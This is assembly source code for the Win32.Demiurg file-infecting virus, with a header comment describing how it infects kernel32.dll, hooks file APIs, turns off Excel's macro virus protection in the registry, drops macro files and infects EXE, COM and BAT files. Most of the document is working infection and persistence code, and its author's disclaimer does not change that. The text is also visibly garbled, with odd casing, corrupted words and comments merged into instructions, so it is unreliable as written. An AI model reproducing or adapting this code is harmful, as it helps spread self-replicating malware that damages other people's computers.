*********************************************************** ***********************
******************* ******************************
******************* WIN32.DEMIURG ******************************
******************* BY ********************
; ******************* Black jack ****************************
******************* ******************************
*********************************************************** ***********************
Comment ~
Name: win32.demiurg
Author: Black Jack [Independant Austrian Win32ASM Virus Coder]
Contact: Black_jack_vx@hotmail.com | http://www.coderz.net/blackjack
TYPE: WIN32 GLOBAL RESIDENT (in kernel32.dll) PE / NE / MZ / COM / BAT / XLS Infector
Size: 16354 bytes
Description:
The Main Instance of the Virus Is in Infected Pe EXE Files (or the PE
Dropper). if Such a file is executed, The first thing the virus does is
Getting the needed API Addresses by Standart Methods (First IT Scans The
Hosts Import Table for the getModuleHandlea API AND USES IT TO GET THE
Keernel32 Handle if found, if not, it gets it by the "scan down from the
Value from the top of stack "-trick, the export table of kernel32 is
Scanned for All Needed Apis, Finally Also Advapi32.dll Is Loaded and Some
Apis for registry Operations fetched from there, then the Virus Performs
Two Tasks Before Returning To The Host: First Infected Kernel32.dll, Then
INFECTED MS-Excel.
To infect kernel32.dll, it is copied from the system directory to the windows. Issued by THE SYSTEM DIRECTOR
Directory and infected there. The infection process is the Same as with
Regular Pe EXE Files (See Later), But Not The Main Entry Point Is Modified, BUINT IS MODIFIED,
But some file modification apis areh hooded (to maintain compatiblity to winnt
In Both Their Ansi and Unicode Versions. To Replace The Old Kernel32.dllwith The Infected Copy, The Virus Uses The Movefileexa API with The Movefileexa API with the
Movefile_delay_until_reboot flag; this will only work in Winnt, But this
Doesn't Matter, Because Win9x Will Use The Copy THE Windows Directory
Rather Than the one in the system directory after the next reboot..
To Infect Excel, The Virus Checks The Registry if A Supported Version (97 OR
2000) IS Installed; if So, IT Turns The Macro Virus Protection Off and Gets
The path where it is installed. Then IT Drops a .xls file with a little macro
As /XLSTART/Demiurg.xls; this file will be loaded Automatic At the next NEXT
Start of Excel, and the macro executed. Besides That, Another Macro Source
Code Is Generated As C: /Demiurg.sys File, That Contains VBA Instructions To
Write the Virus Pe Dropper to C: /Demiurg.exe and Execute It. Please Note That
This Macro Uses 100% VBA Instructions (The Binary Data is Stored in Arrays),
NO stupid debug scripts. this file will be used to infect regular .xls files
With. this means what the the vba instance of the virus is not a "full" macro
Virus, Because it is not able to replicate from one .xls file to another
Directly.
After the kernel32.dll infection, The Virus Will Stay ResidentAfter the next
Reboot. It then catches Most File API Functions and Infects COM, EXE (MZ, NE,
PE) and baq.
The PE EXE Infection Process Is Quite Standart: The last section is increased,
And the virus body is appended after the virtual end of the section in My
Opinion this is much more logical touring inster the physical end, how
IT IS DONE IN MOST WIN32 Virii Nowadays, Because Otherwise The Virus Body CAN
Be overwritten by Host Data (if the last section is the .bss section). Besides That The Virtual Size Is Not Aligned (Although Some
Compilers / Assemblers Like Tasm Align It To Sectionalign, this is not
Necessary, While the Physical Size Is Always Aligned to FileAlign; this
Means we can save some space in some case. The entry point is set to
The Virus Body (In Case of Pe EXE Files) and finally also the imagesize and
THE CHECKSUM (In Case It Was Different To Zero Before Infection) Are Updated
To maintain compatiblity to winnt; to recalculate the crc the
Checksummappedfile API from imagehlp.dll is used.
All Other Infectable Files Are Only Infected "Indirectly": a Small Piece of
Code Is Added That Drops a pe Dropper and infects it. Because of what
Virus Can Only Replicate in Win32 Enviroments, Although IT Infects a Lot of
DiffERENT FileTypes.
DOS EXE Files Are Also Infected In Standart Manner: Some Code Is Absened AT
The end of file, the entrypoint and the stack area set to it, and the
INTERNAL FILESIZE IS That That The Virus IS
Able To Infect Files with Internal Overlays That Wele Generated with Borland
Compilers, in this case the virus is appended between the internal end of there
File and the overlay, after the overlay has been shifted back. this work
Very Fine (To my own surprise); try to infect td.exe for example.
COM Files Are Infected by INTERLY Converting Them To EXE Files By
Prepending A Small Exe Header, And Then Infected Just Like A DOS EXE FILE.
Of Course The Virus Is Also Able To DEAL with Enuns Files, in this case
Enuns Signature Is Threated Just Like An Internal Overlay.
Bat Files Are Infected by Adding Some Bat Code At The end, life; ba file; ba file; ba file limited
Until this character is reached, and off what the pe dropper. The Bat Code
Works by Echoing Out A Small Com File (Which Was Been Written in Such A
Careful Way That It Only Contains Characters That Are LEGIT in Bat Files) To
C: /Demiurg.exe. THIS file is executed with the name of the ba file as
Parameter. Then the com file reads the pe dropper from the end of the BAT
File and Writes it to c: /demiurg.exe too, and then executes the new file.
Ne Files Are Infected with The Method That Was IntroducesD by Mark Ludwig (i
Think): The Code Segment That Contains The Entry Point Is Increased, The Rest
Of the file is shifted back and the ne Header Tables Are Fixed to Reflect There
New Layout of the File. Then A Small Piece of Code Is Injected Into The Newly
Gained room and the entrypoint set to it; beesides what the pe dropper is
Appended at the end of the file as inferness.
Assemble with:
Tasm32 / mx / m Demiurg.asm
TLINK32 / TPE / AA DEMIURG.OBJ,, IMPORT32.LIB
There's no need for pewrsec or a Similar Tool, Because the
Virus Code Is Stored in The Data Section.
Disclaimer: i do * not * support The spreading of viruses in the wild.
Therefore, this Source Was Only Written for Research and
Education. Please do not spread it. The author can't beh
Responsible for what you decide to do with this source.
~
; ================================================== ========================== Workspace EQU 100000
Virus_size EQU (Virus_END-STAR)
EXTRN EXITPROCESS: PROC
EXTRN Messageboxa: Proc
.386
.MODEL FLAT
.DATA
Start:
DB 68H; Push IMM32
Orig_eip DD Offset Dummy_Host; Push Host Entry Point
Pushfd; save flag
Pushad; save all registers
Call delta; Get Delta Offset
Delta:
POP EBP
Sub EBP, Offset Delta
; ----- Get Kernel32 Image Base --------------------------------------------------------------------------------------------------------------------------------------------- -----
DB 0B8H; MOV Eax, IMM32
ImageBase DD 400000H; EAX = ImageBase of Host
MOV EBX, [EAX 3CH]; EBX = New EXE POINTER RVA
Add Ebx, EX; EBX = New EXE POINTER VA
MOV EBX, [EBX 128]; EBX = Import Directory RVA
Add ebx, EBX; EBX = Import Directory VA
Search_kernel32_descriptor:
MOV ESI, [EBX 12]; ESI = Name of Library RVA
OR ESI, ESI; LAST IMPORT DESCRIPTOR?
JZ Failed; if Yes, We failed
Add ESI, ESI ESI = Name of Library VA
Lea EDI, [EBP OFFSET KERNEL32NAME]; EDI = Name of kernel32 VA
MOV ECX, 8; ECX = Length To Compare
CLD; CLD; Clear Direction Flag
Repare the Two strings, COMPARE THE TWO STRINGS
JE FOUND_KERNEL32_DESCRIPTOR; if Equal, We Found IT
Add Ebx, 20; Next Import Descriptor, NEXT IMPORT DESCRIPTOR
JMP Search_kernel32_descriptor; search on
FOUND_KERNEL32_DESCRIPtor:
XOR Edx, EDX; EDX = 0 - Our Counter
Push DWORD PTR [EBX 16]; RVA of Array Of API RVAS
MOV EBX, [EBX]; EBX = Array Of API Name PTRS
OR EBX, EBX; Are there ipis imported? jz pop_failed; if not, we failed
Add Ebx, EAX; EBX = RVA API Name PTRS ARRAY
Search_getmoduleHandle:
MOV ESI, [EBX]; ESI = RVA of A API Name
OR ESI, ESI; SEARCHED ALL API NAMES?
JZ pop_failed; if Yes, WE failed
Test ESI, 80000000H; Is IT An ORDINAL?
Jnz next_api; can't Handle Ordinal Imports
Add ESI, ESI ESI = VA OF API NAME
Inc ESI; SKIP THE Ordinal Hint
Inc ESI
Lea EDI, [EBP Offset getModuleHandlea]; EDI = VA of getModuleHandlea
MOV ECX, L_GMH; ECX = Length getModuleHandlea
CLD; CLD; Clear Direction Flag
Repare the Two strings, COMPARE THE TWO STRINGS
JE Found_getmoduleHandle
Next_api:
Inc EDX; Increment Our API Counter
Inc EBX; EBX = Ptr To Next API Name Ptr
Inc EBX
Inc EBX
Inc EBX
JMP Search_getmoduleHandle; Try Next API Name
Found_getmoduleHandle:
POP EBX; EBX = RVA of Array Of API RVAS
Add EBX, EBX; EBX = VA of Array Of API RVAS
MOV EBX, [EBX EDX * 4]; EBX = getModuleHandlea Entry
Lea EDX, [EBP Offset Kernel32Name]; EDX = Pointer to Kernel32.dll
Push EDX; Push IT
Call Ebx; Call GetModuleHandlea
OR EAX, EAX; GOT KERNEL32 HANDLE / BASE?
Jnz Found_kernel32; if Yes, We got it!
JMP Failed; Otherwise, Try Other Method
POP_FAILED:
POP EBX; Remove Shit from Stack
Failed:; import method failed? Then
Try Memory Scanning Method
MOV EBX, [ESP 10 * 4]; EBX = address INSIDE KERNEL32
Kernel32Find:
CMP DWORD PTR [EBX], "EP"; FOUND A PE HEADER?
JNE Search_on_kernel32; if not, Search ON
MOV EAX, [EBX 34H]; EAX = Module Base Address
OR Al, Al; Is IT ON A Page START?
JNZ Search_on_kernel32; if not, Search ON
CMP Word PTR [EAX], "ZM"; Is there a mz header?
JE Found_kernel32; if Yes, We found kernel32! Search_on_kernel32:
Dec Ebx; Go One Byte Down
JMP kernel32find; and search on
FOUND_KERNEL32:
MOV [EBP Offset Kernel32], EAX; Saver Kernel32 Base Address
Lea ESI, [EBP OFFSET KERNEL32_API_NAMES_TABLE]; Get Apis from
Lea EDI, [EBP OFFSET KERNEL32_API_ADDRESS_TABLE]; kernel32.dll
MOV ECX, Number_Of_kernel32_apis
Call getapis
LEA EAX, [EBP OFFSET Advapi32_dll]; load advapi32.dll
Push EAX
Call [EBP Offset LoadLibrarya]
Lea ESI, [EBP OFFSET Advapi32_API_Names_Table]; Get Apis from
Lea EDI, [EBP OFFSET Advapi32_API_ADDRESS_TABLE]; Advapi32.dll
Mov ECX, Number_Of_ADVAPI32_APIS
Call getapis
Call infect_kernel32
Call infect_excel
Popad; Restore Registers
POPFD
Ret; return to host
; ----- End main routine of the Virus ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ -
Copyright DB "[The Demiurg] - a Win32 Virus by Black Jack", 0
DB "Written in Austria in The Year 2000", 0
; ----- Infect kernel32.dll ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------
INFECT_KERNEL32:
MOV EAX, [EBP SETFILEATTRIBUTESA]; if We're Already Resident,
Sub Eax, [EBP GetFileAttributesa]; We know the Difference
CMP EAX, 2 * API_HOOK_SIZE; BETWEEN THE TWO API ENTRIES:
JE KERNEL32_INFECT_FAILURE; SO 'T Reinfect Kernel32.
Push 260
Lea Eax, [EBP OFFSET PATH_BUFFER1]
Push EAX
Call [EBP Offset getSystemDirectorya]; get the windows system dir
Lea Eax, [EBP OFFSET KERNEL32_DLL]; add /kernel32.dll to string
Push EAX
Lea Eax, [EBP OFFSET PATH_BUFFER1]
Push EAX
Call [EBP OFFSET LSTRCATA]
Push 260; Get the Windows Directory
Lea Eax, [EBP OFFSET PATH_BUFFER2]
Push EAX
Call [EBP Offset getWindowsDirectorya] Lea Eax, [EBP OFFSET KERNEL32_DLL]; add /kernel32.dll to string
Push EAX
Lea Eax, [EBP OFFSET PATH_BUFFER2]
Push EAX
Call [EBP OFFSET LSTRCATA]
Push 1; don't overwrite target
Lea Eax, [EBP OFFSET PATH_BUFFER2]; TARGET
Push EAX
Lea Eax, [EBP OFFSET PATH_BUFFER1]; SOURCE
Push EAX
Call [EBP Offset Copyfilea]; Copy Kernel32.dll from
; System to Windows Directory
OR EAX, EAX
JZ kernel32_infect_failure
Lea Edx, [EBP OFFSET PATH_Buffer2]; Open and map the kernel32.dll
Call OpenFile; in the Windows Directory
MOV EBX, EAX
Add EBX, [EAX 3CH]; EBX = Kernel32 PE Header
Push Ebx; Save the pe header offset
Call append_pe; infect kernel32.dll
POP EBX; EBX = Kernel32 pehader
MOV ECX, Number_Of_hooked_apis; ECX = Number of Apis to Hook
Lea ESI, [EBP OFFSET HOOKED_API_NAMES_TABLE]; ESI = Names of Apis
MOV EDI, (API_HOOKS - Start); EDI = First API Hook Relative
To Virus Start
HOOK_APIS_LOOP:
Call hook_api; hook this API
Mov Eax, ESI; EAX = API Name Address
Next_hook_api_loop:
INC EAX; Search End of String
CMP Byte PTR [EAX 1], 0
JNE NEXT_HOOK_API_LOOP
CMP BYTE PTR [EAX], "A"; ANSI VERSION OF API?
JNE next_API_NAME
MOV BYTE PTR [EAX], "W"; Hook Also Unicode Version
Push EAX
Call Hook_API
POP EAX
MOV BYTE PTR [EAX], "A"; Restore Ansi Version Name
Next_api_name:
Inc Eax; Eax = Next API Name
INC EAX
XCHG ESI, ESI; ESI = Next API Name
Loop hook_apis_loop; Hook Next API
FINISH_KERNEL32_INFECTION:
MOV DWORD PTR [EBX 8], 666; Destroy Keernel32 Build Time
Call finish_pe_infection; Append Virus Body and
Recalculate Checksum
Call Closemap; Close Map and Filepush 5; Flags for MovefileExa
; Moving_replace_existing
Movefile_delay_until_reboot
Lea Eax, [EBP OFFSET PATH_BUFFER1]; TARGET
Push EAX
Lea Eax, [EBP OFFSET PATH_BUFFER2]; SOURCE
Push EAX
Call [EBP Offset MoveFileExa]; NOTE: THIS API CALL WILL
Only Work in Winnt. But this
; Is No Problem, Because Win9x
Will Prefer the kernel32.dll
; in the Windows Directory To
; one in the system
Directory Anyways.
KERNEL32_INFECT_FAILURE:
RET
; ----- Hook One API ----------------------------------------- ---------------
Hook_API:
Push ebx; save registers
Push ECX
PUSH ESI
Push Ebx; Save EBX (PE HDR in Memmap)
Push EDI; Save EDI (Hook "RVA")
Mov Eax, [EBP Offset Kernel32]; EAX = Kernel32 Base Address
Call my_getprocaddress
Edx = RVA of RVA of API in
Export Table
MOV ECX, [EDX EAX]; ECX = API RVA
Add ECX, EAX; ECX = API VA
POP EDI; EDI = "RVA" of API HOOK
POP EBX; EBX = K32 PE Header in Memmap
MOV [EDI EBP OFFSET START 1], ECX; Store Original API VA
Movzx ECX, Word PTR [EBX 6]; ECX = Number of Sections
Movzx Eax, Word PTR [EBX 14H]; SIZE OF OPTIONAL HEADER
Lea EBX, [EAX EBX 18H]; EBX = First Section Header
; 18h = size of file header
Search_section:
MOV ESI, [EBX 0CH]; ESI = Section RVA
CMP ESI, EDX
Ja next_section
Add ESI, [EBX 8]; Add Section Virtual Size
CMP ESI, EDX
Ja Found_Section
Next_section:
Add EBX, 40; 40 = Section Header Size
LOOP Search_section
Section_not_found:
JMP EXIT_HOOK_API
Found_section:
Sub EDX, [EBX 0CH]; Section RVA
Add Edx, [EBX 14H]; Start of Raw Data
Edx = Physical Offset of
; API RVA IN K32 Export Tableadd Edx, [EBP Offset Mapase]; EDX = Address In Memmap
Mov Eax, EDI
Add Eax, [EBP Offset Virus_RVA]; EAX = API HOOK RVA IN K32
MOV [EDX], EAX; Hook API
EXIT_HOOK_API:
Add Edi, API_HOOK_SIZE; EDI = Next API HOOK
POP ESI
POP ECX
POP EBX
RET
; ----- Hooks for APIS ----------------------------------------- -------------
API_HOOKS:
CreateFilea_hook:
Push 12345678H
JMP Hooka
API_HOOK_SIZE EQU ($ - Offset Createfilea_hook)
CREATEFILEW_HOOK:
Push 12345678H
JMP hookw
GetFileAttributesa_hook:
Push 12345678H
JMP Hooka
GetFileAttributesw_hook:
Push 12345678H
JMP hookw
SetFileAttributesa_hook:
Push 12345678H
JMP Hooka
SetFileAttributeESW_HOOK:
Push 12345678H
JMP hookw
CopyFilea_hook:
Push 12345678H
JMP Hooka
CopyFilew_hook:
Push 12345678H
JMP hookw
Movefileexa_hook:
Push 12345678H
JMP Hooka
Movefileexw_hook:
Push 12345678H
JMP hookw
Movefilea_hook:
Push 12345678H
JMP Hooka
Movefilew_hook:
Push 12345678H
JMP hookw
_lopen_hook:
Push 12345678H
Hooka:
Pushf
Pusha
Call hooka_next
Hooka_next:
POP EBP
Sub ebp, offset hooka_next
MOV EDI, [ESP 11 * 4]
Call Infect
POPA
POPF
RET
Hookw:
Pushf
Pusha
Call hookw_next
Hookw_next:
POP EBP
Sub ebp, offset hookw_next
MOV ESI, [ESP 11 * 4]
Lea EDI, [EBP OFFSET PATH_BUFFER1]
Push EDI
Push 0; useless default character
Push 0; useless default character
Push 260; Length of Destination Buffer
Push EDI; Offset of Destination Buffer
Push -1; find length automaticly
Push ESI; Address Of Source Buffer
Push 0; No Special Flags
Push 0; CODEPAGE: CP_ACP (ANSI)
Call DWORD PTR [EBP WideChartomultiByte]
OR EAX, EAX
JZ WideChartomultibyte_failed
POP EDI
Call Infect
WideChartomultibyte_failed: POPA
POPF
RET
; ----- Infect Excel -------------------------------------------------------------------------------------- ----------------
Infect_excel:
MOV [EBP Office_version_Number], "8"; First Try Excel97 (V8.0)
TRY_EXCEL:
Open the regkey with the
MS-EXCEL OPTIONS
Lea Eax, [EBP Offset REG_HANDLE1]; Offset Registry Handle
Push EAX
Push 2; Access: key_set_value
Push 0; reserved
Lea Eax, [EBP OFFSET Regkey]; Which Regkey
Push EAX
PUSH 80000001H; HKEY_CURRENT_USER
Call [EBP Offset RegopenKeyexa]
OR EAX, Eax; Success => EAX = 0
JZ Found_Excel
CMP [EBP Office_version_Number], "9"; Already Tried Both Versions?
JE Failure; No Excel Found, WE Failed
INC [EBP Office_Version_Number]; Try Also Excel2000
JMP TRY_EXCEL
Found_excel:
CMP [EBP Office_version_Number], "9"; Which Version Found?
JE UNPROTECT_EXCEL2K
Unprotect_excel97:
Lea Eax, [EBP Offset REG_HANDLE2]; Offset Registry Handle
Push EAX
Push 2; Access: key_set_value
Push 0; reserved
Lea Eax, [EBP OFFSET SUBKEY_97]; Which Regkey
Push EAX
Push DWORD PTR [EBP OFFSET REG_HANDLE1]; Registry Handle
Call [EBP Offset RegopenKeyexa]
OR EAX, Eax; Success => EAX = 0
JNZ Failure
MOV DWORD PTR [EBP Offset Regval_dword], 0; 0 means Macro Virus
Protection OFF
LEA EDX, [EBP Offset Regvalue_Options]; Offset Value Name
JMP general_unprotect
Unprotect_excel2k:
Lea Eax, [EBP Offset Regval_dword]; Disposition (Uninteresting)
Push EAX
Lea Eax, [EBP Offset REG_HANDLE2]; Offset Registry Handle
Push EAX
Push 0; Security Attributes
Push 6; Access: key_set_value and
Key_Create_Sub_Key
Push 0; reg_option_non_volatile
Push 0; Address of class stringpush 0; reserved
Lea Eax, [EBP Offset Subkey_2k]; Which Regkey
Push EAX
Push DWORD PTR [EBP OFFSET REG_HANDLE1]; Registry Handle
Call [EBP RegcreateKeyexa]
OR EAX, EAX
JNZ Failure
MOV DWORD PTR [EBP Offset Regval_dword], 1; 1 - Lowest Level of
; Macro SECURITY
Lea EDX, [EBP Offset Regval_2k]; Offset Value Name
General_unprotect:
Now Disable The MS-Excel
Macro Virus Protection.
Push 4; Size of buffer
Lea Eax, [EBP OFFSET Regval_dword]; Address of buffer
Push EAX
Push 4; REG_DWORD
Push 0; reserved
Push Edx; Offset Value Name
Push [EBP REG_HANDLE2]; REG HANDLE
Call [EBP Offset RegSetValueexa]
OR EAX, EAX
JNZ Failure
Push [EBP REG_HANDLE2]; Close The Regkey Again
Call [EBP OFFSET RegcloseKey]
OR EAX, EAX
JNZ Failure
Push [EBP REG_HANDLE1]; Close The Regkey Again
Call [EBP OFFSET RegcloseKey]
OR EAX, EAX
JNZ Failure
; Open the regkey where wee WEE WE
Will Find The Path to Excel
Lea Eax, [EBP Offset REG_HANDLE1]; Offset Registry Handle
Push EAX
Push 1; Access: key_query_value
Push 0; reserved
Lea Eax, [EBP OFFSET Regkey]; Which Regkey
Push EAX
PUSH 80000002H; HKEY_LOCAL_MACHINE
Call [EBP Offset RegopenKeyexa]
OR EAX, Eax; Success => EAX = 0
JNZ Failure
Lea Eax, [EBP Offset REG_HANDLE2]; Offset Registry Handle
Push EAX
Push 1; Access: key_query_value
Push 0; reserved
Lea Eax, [EBP OFFSET SUBKEY_INSTALLROOT]; Which Regkey
Push EAX
Push DWORD PTR [EBP OFFSET REG_HANDLE1]; REG HANDLE
Call [EBP Offset RegopenKeyexa]
OR EAX, Eax; Success => EAX = 0
JNZ Failure
Get the path where MS-Excel
IS ISTALLED
Lea Eax, [EBP Offset Size_buffer]; Address of Data Buffer Sizemov DWORD PTR [EAX], 260; Set Size of Data Buffer
Push EAX
Lea Eax, [EBP OFFSET PATH_BUFFER1]; Address of Data Buffer
Push EAX
Lea Eax, [EBP OFFSET REG_SZ]; Address of Buffer for Value
Push Eax; Type (Asciiz String)
Push 0; reserved
Lea Eax, [EBP OFFSET Regval_path]; Address of Name of Value
Push eax; to query
Push [EBP REG_HANDLE2]; Handle of Regkey to Query
Call [EBP OFFSET RegQueryValueexa]
OR EAX, EAX
JNZ Failure
Push [EBP REG_HANDLE1]; Close The Regkey
Call [EBP OFFSET RegcloseKey]
OR EAX, EAX
JNZ Failure
Push [EBP REG_HANDLE2]; Close The Regkey
Call [EBP OFFSET RegcloseKey]
OR EAX, EAX
JNZ Failure
Lea Eax, [EBP Offset Demiurg_xls]; add "/ xlstart/demiurg.xls"
PUSH EAX; (Our Macro Dropper file)
Lea Eax, [EBP OFFSET PATH_BUFFER1]; To the Excel Path
Push EAX
Call [EBP OFFSET LSTRCATA]
Lea EDX, [EBP OFFSET PATH_BUFFER1]; Create this file
Call Createfile
JC Failure
LEA ESI, [EBP OFFSET MACRO_DROPPER]; Decompress Our Macro Dropper
MOV EDI, EAX; File to the filemap
MOV EBX, Macro_Dropper_size
Call Decompress
MOV DWORD PTR [EBP FileSize], 16384; FileSize of Macro Dropper
Call Closemap; Close The Macro Dropper file
Push Dropper_size; Allocate Memory Where WE CAN
Push 0; Create The PE Virus Dropper
Call [EBP OFFSET GLOBALLOC]
OR EAX, EAX
JZ Failure
MOV [EBP HEAP_Buffer], EAX; Save Memory Base Address
XCHG EDI, EAX; EDI = Address Of Allocated MEM
Call Create_Dropper
Lea Edx, [EBP OFFSET MACRO_FILENAME]; CREATE THE FILE THE
Call CreateFile; Macro Dropper Code Source
JC Failure; That Will BE Used to Infect
Excel Files
XCHG EDI, EAX; EDI = Base of Memmap
Lea ESI, [EBP OFFSET Main_Macro_code]; Copy Main VBA Code To There
MOV ECX, Main_Macro_code_size
CLD
REP MOVSB
MOV BYTE PTR [EBP SUB_NAME], "B"; Name of The First VBA SUB
MOV ESI, [EBP HEAP_BUFFER]; ESI = Pe Dropper IMAGE IN MEM
MOV ECX, (Dropper_size / 128); ECX = Number of A = array (...)
LINES THAT ARE LEFT
Build_subs_loop:
Push ESI; SAVE ESI
LEA ESI, [EBP OFFSET SUB_HEADER]; Copy "SUB B ()"
Movsd; Move 9 bytes
Movsd
Movsb
POP ESI; Restore ESI
MOV Eax (((Dropper_Size / 128) 5) / 6); Number of Lines in One Sub
CMP ECX, EAX; Last Sub?
JB Push_0; ECX = 0 afterwards (no more
LINES LEFT)
Sub ECX, EAX; OtherWise ECX = Number of
LINES LEFT
Push Ecx; Save IT
MOV ECX, ECX; ECX = NR. of lines in one SUB
JMP build_lines_loop
Push_0:
PUSH 0
Build_lines_loop:
Push ECX; Save Number of Lines Left
MOV EAX, "ra = a"; add string "a = array ("
Stosd
Mov Eax, "(YAR"
Stosd
MOV ECX, 128; ECX = NumBers in One Line
Build_nubers_loop:
Push Ecx; Save ECX
XOR Eax, Eax; EAX = 0
Lodsb; al = one byte from Dropper
MOV ECX, 3; ECX = 3 (Nuber of Digits)
Number_loop_head:
XOR EDX, EDX; EDX = 0 (High DWORD for Div)
MOV EBX, 10; EBX = 10
Div Ebx; EDX = Mod, EAX = DIV
Add DL, '0'; DL = One DIGIT
Push EDX; Save IT
Loop Number_Loop_Head
POP EAX; Al = One Digit
StoSB; Store IT
POP Eax; Al = Next Digit
Stosb
POP EAX
Stosb
Mov Al, ','; Store A Comma
Stosb
POP ECX; ECX = Number of Bytes Left
Loop build_nubers_loop
Dec Edi
MOV EAX, ")" 0A0D00H "W" * 1000000h; add ") CRLFWCRLF" Stosd
MOV AX, 0A0DH
Stosw
POP ECX; Restore Number of Lines Left
Loop Build_Lines_Loop
Push ESI; SAVE ESI
Lea ESI, [EBP OFFSET END_SUB]; Store An "End Sub"
Movsd; Move 9 bytes
Movsd
Movsb
POP ESI; Restore ESI
Inc BYTE PTR [EBP SUB_NAME]; New Name for Next Sub
POP ECX; ECX = Number of Lines LEFT
OR ECX, ECX
Jnz build_subs_loop
Sub EDI, [EBP MAPBASE]; EDI = Size of VBA CODE
MOV [EBP FileSize], EDI; Save IT as FileSize
Call Closemap; Close THE MAP / FILE
Push [EBP HEAP_Buffer]; Free Allocated Memory
Call [EBP GLOBALFREE]
Failure:
RET
; ----- Infect File ------------------------------------------------------------------------------------------------------------------------------------------------ ---------------
Infect:
Push EDI
XOR Eax, Eax; EAX = 0
MOV ECX, EAX; ECX = 0
Dec ECX; ECX = 0FFFFFFFFH
CLD; CLD; Clear Direction Flag
Repne scaSB; Search for end of filename
MOV EAX, [EDI-5]; EAX = filename extension
OR Eax, 20202020h; Make It Lowercase
POP EDX
CMP EAX, "EXE."; EXE file?
JE infect_exe_com
CMP EAX, "MOC."; COM FILE?
JE infect_exe_com
CMP EAX, "Tab."; BAT file?
JNE quit_infect_error
; ----- Infect Bat File ----------------------------------------- ----------------
Infect_bat:
Call OpenFile; Open and Map the Victim
JC quit_infect_error; opening / mapping failed?
XCHG EDI, EAX; EDI = Start of Memmap
Add Edi, [EBP Offset FileSize]; EDI = End of File In Memmap
CMP BYTE PTR [EDI-1], 0; ALREADY INFECTED?
JE Already_INFECTED
Lea ESI, [EBP OFFSET BAT_VIRUS_CODE]; ESI = BAT Code To Add
MOV ECX, SIZE_BAT_VIRUS_CODE
CLD
Rep Movsb; Add Bat Code
Call Create_Dropper; Add pe Dropper As overlay
Add DWORD PTR [EBP OFFSET FILESIZE], (SIZE_BAT_VIRUS_CODE DROPPER_SIZE) JMP Abort_Infection
; ----- Infect a EXE or Com file -------------------------------------- --------
INFECT_EXE_COM:
Call OpenFile; Open and Map the Victim
JC quit_infect_error; opening / mapping failed?
CMP Word PTR [EAX], "ZM"; HAS IT A MZ HEADER?
JE Infect_exe
CMP Word PTR [EAX], "MZ"; HAS IT A MZ HEADER?
JE Infect_exe
; ----- Infect COM File --------------------------------------- ----------------
Infect_com:
MOV ECX, [EBP OFFSET FileSize]; ECX = Size of Victim File
Mov ESI, ECX
Dec ESI
Add ESI, [EBP OFFSET MAPBASE]; ESI = End of File In Memmap
Mov EDI, ESI
Add EDI, 32
STD
Rep Movsb; SHIFT WHOLE FILE Back
Lea ESI, [EBP OFFSET New_MZ_HEPENER]; Prepend The Mz Header
MOV EDI, [EBP Offset Mapase]
MOV EBX, New_MZ_HEADER_SIZE
Call Decompress
MOV EAX, [EBP OFFSET FILESIZE]; UPDATE FILESIZE
Add Eax, 32
MOV [EBP FileSize], EAX
MOV EBX, [EBP Offset Mapase]
CMP Word PTR [EAX EBX-4], "SN"; Enuns CHECK
JNE NO_ENUN
Add Word PTR [EAX EBX-2], 1234H; FIX Enuns Shit
ORG $ -2; Otherwise Tasm Will Give A
DW (((size_dos_virus_code 15 dropper_size) / 16) * 16); Warning, Dunno why
Sub Eax, 7; Make the Enuns an overlay
NO_ENUN:
XOR EDX, EDX; Calculate FileSize for
MOV ECX, 512; MZ Header
Div ECX
OR EDX, EDX; MOD
JZ NO_PAGE_ROUNDUP
Inc Eax; DIV
NO_PAGE_ROUNDUP:
MOV [EBX 2], EDX
MOV [EBX 4], EAX
XCHG EAX, EBX
NOW INFECT IT AS Regular EXE
; ----- EXE File Infection ----------------------------------------- ---------
Infect_exe:
CMP Word PTR [EAX 12H], "JB"; Already Infected?
JE Already_INFECTED
MOV Word PTR [EAX 12H], "JB"; Mark As InfectDcmp Word PTR [EAX 18H], 40H
JE new_exe
; ----- DOS EXE Infection --------------------------------------- ------------
DOS_EXE:
MOV BX, [EAX 0EH]; Save Relo_ss
MOV [EBP RELO_SS], BX
MOV BX, [EAX 10h]; Save SP_START
MOV [EBP SP_START], BX
MOV BX, [EAX 14H]; Save IP_START
MOV [EBP IP_START], BX
MOV BX, [EAX 16H]; Save Relo_CS
MOV [EBP RELO_CS], BX
Movzx EBX, Word PTR [EAX 2]; Calculate Internal FileSize
Movzx ECX, Word PTR [EAX 4]
OR EBX, EBX
JZ NO_PAGE_ROUND
Dec ECX
NO_PAGE_ROUND:
Mov Eax, 512
Mul ECX
Add Eax, EBX
MOV [EBP OFFSET DOS_EXE_SIZE], EAX
CMP [EBP OFFSET FileSize], EAX; HAS IT An Internal Overlay?
JE NO_INTERNAL_OVERLAYS
WITH_OVERLAY:
MOV ESI, [EBP Offset Mapase]
CMP DWORD PTR [EAX ESI], "VOBF"; Internal Overlay Of Borland?
JE Infectable_overlay
CMP Word PTR [EAX ESI 3], "SN"; Enuns Com File Converted
BY USBEFORE?
JNE Abort_infection
Infectable_overlay:
MOV ECX, [EBP FileSize]; Shift Internal overlay Back, SHIFT INTERLERLAY BACK
Mov ESI, ECX
SUB ECX, EAX
Dec ESI
Add ESI, [EBP MAPBASE]
Mov EDI, ESI
Add Edi ((((SIZE_DOS_VIRUS_CODE 15 DROPPER_SIZE) / 16) * 16)
STD
REP MOVSB
NO_INTERNAL_OVERLAYS:
Add DWORD PTR [EBP FileSize] (((SIZE_DOS_VIRUS_CODE 15 DROPPER_SIZE) / 16) * 16)
Add DWORD PTR [EBP DOS_EXE_SIZE] (((SIZE_DOS_VIRUS_CODE 15 DROPPER_SIZE) / 16) * 16)
MOV EBX, [EBP MAPBASE]
Mov Edi, EAX
Add Edi, EBX
Lea ESI, [EBP OFFSET DOS_VIRUS_CODE]
MOV ECX, SIZE_DOS_VIRUS_CODE
CLD
REP MOVSB
Call Create_Dropper
XOR EDX, EDX
MOV ECX, 16
Div ECX; EDX: EAX / ECX
EAX = Div, edx = mod
SUB AX, [EBX 08H]; SIZE OF Header (Paragr); EAX = Virus Segment
MOV Word PTR [EBX 0EH], AX; New Relo_ss
MOV Word PTR [EBX 10H], 6000H; New SP_START
MOV Word PTR [EBX 14H], DX; New IP_Start
MOV Word PTR [EBX 16H], AX; New Relo_CS
MOV EAX, [EBP DOS_EXE_SIZE]
XOR EDX, EDX
MOV ECX, 512
Div ECX
OR EDX, EDX; MOD
JZ NO_PAGE_ROUNDUP_
Inc Eax; DIV
